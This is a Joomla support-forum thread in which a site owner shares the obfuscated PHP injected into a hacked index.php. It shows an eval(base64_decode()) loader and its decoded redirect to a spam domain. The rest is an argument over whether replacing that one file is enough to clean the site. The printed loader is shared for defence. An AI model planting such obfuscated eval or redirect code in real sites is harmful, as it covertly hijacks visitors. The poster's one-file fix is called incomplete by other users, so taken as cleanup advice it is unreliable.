The Joomla! Forum ™



Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic This topic is locked, you cannot edit posts or make further replies.  [ 17 posts ] 
Author Message
PostPosted: Tue Jan 22, 2013 3:29 pm 
Joomla! Intern
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Someone hacked one of my client's websites by changing the index.php file in the Joomla root. The site was redirecting after 25 seconds to shopforza .info which was somehow going to [spam].com. I started scanning some files for changed dates and found that /index.php was changed. I opened it and it was Base64 encoded which was a red flag since Joomla is open source.

Code:
<? eval(base64_decode('ZGVmaW5lKCAnX0pFWEVDJRvU3RyaW5nKCRtYWluZnJhbWUtPmdldENmZygnZ3ppcCcpKTs='));?>


That gets decoded to
Code:
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
eval(base64_decode('aGVhZGVyKCJSZTsgdXJsPVwiaHR0cDovL3Nob3Bmb3J6YS5pbmZvL25ldFwiIik7'));
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;


$mainframe =& JFactory::getApplication('site');



$mainframe->route();



echo JResponse::toString($mainframe->getCfg('gzip'));



Which also has more encoding which decodes to

Code:
header("Refresh: 25; url=\"http://shopforza .info/net\"");


Hopefully this will help someone get their site back and future reference...


Last edited by mandville on Tue Jan 22, 2013 5:11 pm, edited 2 times in total.
trimmed code, broke links, trimmed hack script.


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 3:32 pm 
Joomla! Intern
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
This forum's filter is removing the site name which could be important for SEO. My client's site was being redirected to [spam] (dot) com, [spam].com, [spam] .com. I am not spamming! This could help someone find their compromised files quicker and fix their website.

BTW the site was running joomla 1.5.26.


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 5:14 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12512
Location: The Girly Side of Joomla in Sussex
please follow the forum stickie regarding posting the fpa to assist us in assisting you.

Regarding your complaint that the forum censor acting properly. how would the hacked site url be relevant and a boost for seo? there is no moral value in promoting /sending someone to a hacked site.
Following the forum stickie and checklist 7 is a great start for getting a hacked site repaired quickly.

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 5:59 pm 
Joomla! Intern
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
mandville wrote:
please follow the forum stickie regarding posting the fpa to assist us in assisting you.

Huh? Why? I am posting a solution, not a question. I found out why my site was being redirected and how. I posted this hoping to help someone else.

mandville wrote:
Regarding your complaint that the forum censor acting properly. how would the hacked site url be relevant and a boost for seo? there is no moral value in promoting /sending someone to a hacked site.
Following the forum stickie and checklist 7 is a great start for getting a hacked site repaired quickly.


If someone searched for "joomla 1.5 redirect xyz.com" or "joomla 1.5 hacked xyz.com" this post should come up, simple SEO. Obviously that would require the correct domain name to be listed, which your filters are preventing.


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 7:44 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12512
Location: The Girly Side of Joomla in Sussex
i can not see how your post actually resolved the hijack/hack etc. if you had searched online you would have found that both the links you posted (including the url in the topic title which is not permitted under forum rules) would have lead the unwary/inquisitive to a malware dropping site including several resolutions to the browser hijack.

from experience "most" people would not search, they would post a help - hacked topic. which of course still leaves the fact you posted direct links to malware dropping sites. now you know the reason they are censored on this forum.

how did you resolve your clients hack?

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 7:48 pm 
Joomla! Intern
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
mandville wrote:
how did you resolve your clients hack?


Um, replaced index.php with a non hacked version...thought that was obvious.


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 8:33 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25815
Location: @Webdongle
prophotodx wrote:
mandville wrote:
how did you resolve your clients hack?


Um, replaced index.php with a non hacked version...thought that was obvious.

That is equivalent to re painting one wall after someone broke into a building and trashed the place. It does nothing to fix other damage and it does nothing to secure the site to prevent it happening again.

_________________
'When I'm right nobody remembers when I'm wrong nobody forgets.'

http://weblinksonline.co.uk/joomla-faq.html
http://www.weblinksonline.co.uk/updating-joomla.html


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 8:37 pm 
Joomla! Intern
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Webdongle wrote:
prophotodx wrote:
mandville wrote:
how did you resolve your clients hack?


Um, replaced index.php with a non hacked version...thought that was obvious.

That is equivalent to re painting one wall after someone broke into a building and trashed the place. It does nothing to fix other damage and it does nothing to secure the site to prevent it happening again.


The site has been secured, at least as secure as a 1.5 site can get. It wasn't done before thats why it happened.


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 9:16 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25815
Location: @Webdongle
prophotodx wrote:
...
The site has been secured... It wasn't done before thats why it happened.
But because you have not deleted all the files then it is not certain the site is secure. You may have looked for other hacked files and not seen any ... but that does not mean they are not there. The only way to be certain is delete all the files and replace with fresh ones.

_________________
'When I'm right nobody remembers when I'm wrong nobody forgets.'

http://weblinksonline.co.uk/joomla-faq.html
http://www.weblinksonline.co.uk/updating-joomla.html


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 9:28 pm 
Joomla! Intern
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Webdongle wrote:
prophotodx wrote:
...
The site has been secured... It wasn't done before thats why it happened.
But because you have not deleted all the files then it is not certain the site is secure. You may have looked for other hacked files and not seen any ... but that does not mean they are not there. The only way to be certain is delete all the files and replace with fresh ones.

I don't understand why you are arguing with me...SITE HAS BEEN SECURED, THIS IS A POST FOR FUTURE REFERENCE FOR OTHERS...


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 9:57 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25815
Location: @Webdongle
prophotodx wrote:
...
I don't understand why you are arguing with me...SITE HAS BEEN SECURED...
I am not arguing with you I am telling you a fact. Unless all the files have been deleted then it is not 100% certain the site is secure. It is you that is shouting.


prophotodx wrote:
...
THIS IS A POST FOR FUTURE REFERENCE FOR OTHERS...
And that is why the facts must be told. Unless all the files have been deleted then it is not 100% certain the site is secure. On large sites with professional IT staff it is possible to be reasonably sure using other methods. But this forum has many inexperienced users(some even have to be told how to copy/paste). To start a thread as a 'future reference for others' and only state that replacing the "index.php with a non hacked version" ... is at the least very irresponsible.

To start such a thread after making c. 40 posts and asking basic questions is [spam]. If you wish to ignore the advice on viewtopic.php?f=432&t=475313 that is up to you. But to make c. 40 posts (that clearly show your lack of knowledge) then give bad advice ... needs to be addressed for the sake of the inexperienced users who read this thread.

_________________
'When I'm right nobody remembers when I'm wrong nobody forgets.'

http://weblinksonline.co.uk/joomla-faq.html
http://www.weblinksonline.co.uk/updating-joomla.html


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 10:17 pm 
Joomla! Intern
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Amazing how someone who is supposed to be helping is only continuing to argue with me and tell me I'm a noob when they don't even know me. All you had to say was 'for others with this issue be sure to read through this thread xxxxx.xxxxx to be sure your site is secure' instead of defaming me.


Top
 Profile  
 
PostPosted: Tue Jan 22, 2013 10:50 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25815
Location: @Webdongle
prophotodx wrote:
Amazing how someone who is supposed to be helping is only continuing to argue with me and tell me I'm a noob ...
I am not arguing with you and I am not arguimg with you. I am stating a fact the the many of the users on the forum are inexperienced ... and that it is irresponsible for you to suggest that replacing the index.php file makes the site secure.



prophotodx wrote:
... All you had to say was 'for others with this issue be sure to read through this thread xxxxx.xxxxx to be sure your site is secure' instead of defaming me.
I explained why it was necessary to delete all the files. And explained that there are other methods that experienced IT experts can use. Also I explained that your method was not suitable for inexperienced users.

I did not 'defame' you ... all I did was point out you make c. 40 posts asking basic questions then start a thread that has inaccurate and incomplete information.

You are the one that is arguing, you argue when an experienced moderator has the need to edit your posts. And you argue 'black is white' when the facts are placed in front of you. Then you accuse me of just pointing to a 'sticky' thread.

The crux of the matter is that you posted information that was not accurate and could mislead inexperienced users to ignore the most effective method. My posts were(and are not) personal attacks on you. My posts are for the inexperienced users who may have read your posts so they could see the flaws in the logic of what you posted.

_________________
'When I'm right nobody remembers when I'm wrong nobody forgets.'

http://weblinksonline.co.uk/joomla-faq.html
http://www.weblinksonline.co.uk/updating-joomla.html


Top
 Profile  
 
PostPosted: Wed Jan 23, 2013 4:20 pm 
Joomla! Intern
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Webdongle wrote:
I am not arguing with you and I am not arguimg with you. I am stating a fact the the many of the users on the forum are inexperienced ... and that it is irresponsible for you to suggest that replacing the index.php file makes the site secure.

Just the fact that you continue to post and argue that you are not arguing shows your need to be right. Stop posting and then the argument will be over.


Webdongle wrote:
The crux of the matter is that you posted information that was not accurate and could mislead inexperienced users to ignore the most effective method. My posts were(and are not) personal attacks on you. My posts are for the inexperienced users who may have read your posts so they could see the flaws in the logic of what you posted.

I consider it a personal attack which is not how a 'experienced moderator' should act. Your actions and attitude are are poor reflection on the joomla community and this forum. No wonder people hate posting here hoping for help, even the mods have a bad attitude.


Top
 Profile  
 
PostPosted: Wed Jan 23, 2013 4:54 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25815
Location: @Webdongle
prophotodx wrote:
...
Just the fact that you continue to post and argue that you are not arguing shows your need to be right. Stop posting and then the argument will be over.
...
Stating facts is not arguing it is debating a point. And the point is the advice you posted was incorrect, inaccurate and misleading to inexperienced users. Your other posts do nothing to qualify your statement and only try to confuse the issue by evading the main point.



prophotodx wrote:
...
I consider it a personal attack which is not how a 'experienced moderator' should act. Your actions and attitude are are poor reflection on the joomla community and this forum. No wonder people hate posting here hoping for help, even the mods have a bad attitude.
A difference of opinion is not a personal attack it is just a different opinion ... no more no less. The fact that you take objection with someone having a different opinion to yours is a reflection on you not anyone else. As for you claiming people hate posting here ... The amount of posts(especially solved posts) proves your statement incorrect.

Again(for the inexperienced users who read this thread) ... just replacing the index.php file is not enough to remove the hack and secure the site. Before you post please read this gives specific instructions on how to do that.

There are similar instructions for 2.5 viewtopic.php?f=621&t=582854 and 3.0 viewtopic.php?f=714&t=757645

_________________
'When I'm right nobody remembers when I'm wrong nobody forgets.'

http://weblinksonline.co.uk/joomla-faq.html
http://www.weblinksonline.co.uk/updating-joomla.html


Top
 Profile  
 
PostPosted: Wed Jan 23, 2013 4:56 pm 
Joomla! Intern
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
hey look webdongle still can't leave this alone!!! That's a great mod for you...


Top
 Profile  
 
PostPosted: Wed Jan 23, 2013 6:08 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12512
Location: The Girly Side of Joomla in Sussex
degenerating topic locked
webdongle is not a moderator nor does he claim to be

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic This topic is locked, you cannot edit posts or make further replies.  [ 17 posts ] 



Who is online

Users browsing this forum: No registered users and 11 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group